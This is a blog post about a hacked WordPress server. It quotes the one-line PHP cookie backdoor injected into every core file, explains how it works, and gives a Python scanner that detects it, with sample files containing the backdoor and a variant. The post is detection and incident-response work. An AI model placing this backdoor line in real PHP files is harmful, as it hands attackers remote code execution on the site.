So this new one hit me pretty hard today. With a normal WordPress hack I go through the plugins, see what’s infected, and work my way out. This time? Nope. Heck, even Google’s Safe Browsing Site Status came back as “Not Dangerous”. Online scanners came back clean, and I was beginning to question what was what when, lo and behold, in the Google SERP: This site may be hacked.
Something was amiss. The plugin CodeGuard was installed and activated. From their service: “When a change is detected, we will alert you and take a new backup of your database and site content.” There are a lot of backups on the site, and I wondered if the site owner was ever notified, or even cared. Upon closer inspection, the API for the service was not set.
All files were touched by the hack; the line

    if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);

was added to each core file. index.php, .htaccess and a file in root called post.php were altered/added respectively. Because of their size I put them up on GitHub at: https://github.com/michalsen/hacked_files
Yep, this server was rooted.
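The injected one-liner works because PHP treats `$string(...)` as a call to whatever function the string names, so a request carrying cookies `user` and `id` lets the attacker pick both the function and its argument; the leading `@` just hides any warning. No legitimate WordPress file ever calls a superglobal as a function, which makes the syntax itself a reliable indicator. The scanner below is an added example written for this post (not code from the post or from the hacked_files repository) that walks a WordPress tree and flags that pattern plus its two-statement variant; the sample tree it builds is constructed for the demonstration and the file names are assumptions.

```python
"""Scan a WordPress tree for the cookie-driven backdoor pattern.

The injected line from the post looks like:
    if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);
"""
import re
import tempfile
from pathlib import Path

# A superglobal element used directly as a callable: $_COOKIE["x"](...  /  $_POST['y'](...
SUPERGLOBAL_CALL = re.compile(
    r"\$_(?:COOKIE|GET|POST|REQUEST|SERVER)\s*\[[^\]]+\]\s*\(")

# The same trick split over two statements:  $f = $_COOKIE["user"]; $f($_COOKIE["id"]);
VAR_CALL_WITH_SUPERGLOBAL_ARG = re.compile(
    r"\$\w+\s*\(\s*\$_(?:COOKIE|GET|POST|REQUEST)\s*\[")

PHP_EXTENSIONS = {".php", ".phtml", ".inc"}


def scan_text(text):
    """Return (line_number, stripped_line, rule_name) for every suspicious line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if SUPERGLOBAL_CALL.search(line):
            findings.append((lineno, line.strip(), "superglobal-as-callable"))
        elif VAR_CALL_WITH_SUPERGLOBAL_ARG.search(line):
            findings.append((lineno, line.strip(), "variable-call-with-superglobal-arg"))
    return findings


def scan_tree(root):
    """Walk `root` and return {relative_path: findings} for PHP files that hit a rule."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in PHP_EXTENSIONS:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report


def build_sample_tree():
    """Constructed mini WordPress tree (assumed layout): two clean files, two infected."""
    root = Path(tempfile.mkdtemp(prefix="wp-scan-"))
    (root / "wp-includes").mkdir()
    (root / "wp-content").mkdir()
    # Clean: ordinary superglobal reads must not be flagged.
    (root / "wp-includes" / "load.php").write_text(
        "<?php\n$name = isset($_COOKIE['wp_lang']) ? $_COOKIE['wp_lang'] : 'en';\n")
    (root / "wp-content" / "readme.txt").write_text("not php, ignored\n")
    # Infected: the exact one-liner from the post prepended to a core file.
    (root / "index.php").write_text(
        '<?php if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);\n'
        "define('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n")
    # Infected: same trick, two statements (constructed variant, not from the post).
    (root / "post.php").write_text(
        "<?php\n$fn = $_COOKIE['user'];\n$fn($_COOKIE['id']);\n")
    return root


if __name__ == "__main__":
    # Point scan_tree at a real docroot instead of the sample to check a live install.
    for rel, hits in scan_tree(build_sample_tree()).items():
        for lineno, line, rule in hits:
            print(f"{rel}:{lineno} [{rule}] {line}")
```

Run it against the sample tree and only index.php and post.php are reported; the ordinary cookie read in load.php passes. Because every core file was touched in this incident, a hit in one file is a cue to compare the whole tree against a fresh WordPress download rather than clean files one at a time.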